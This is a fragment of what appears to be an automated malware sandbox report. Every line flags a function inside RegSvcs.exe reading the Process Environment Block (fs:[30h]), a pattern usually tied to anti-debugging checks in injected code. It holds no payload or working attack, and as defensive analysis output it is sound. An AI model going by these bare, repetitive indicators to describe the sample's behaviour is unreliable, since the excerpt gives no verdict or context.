Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01322397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132138B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132138B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132138B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013AD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01301B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01301B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013A23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013A23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013A23E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01334A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01334A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01313A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01308A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0133927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013C8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013BEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01384257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01322AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_01322ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0137A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01317D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01333D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01373540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A3D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013235A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A44B mov eax, dword ptr fs:[00000030h]
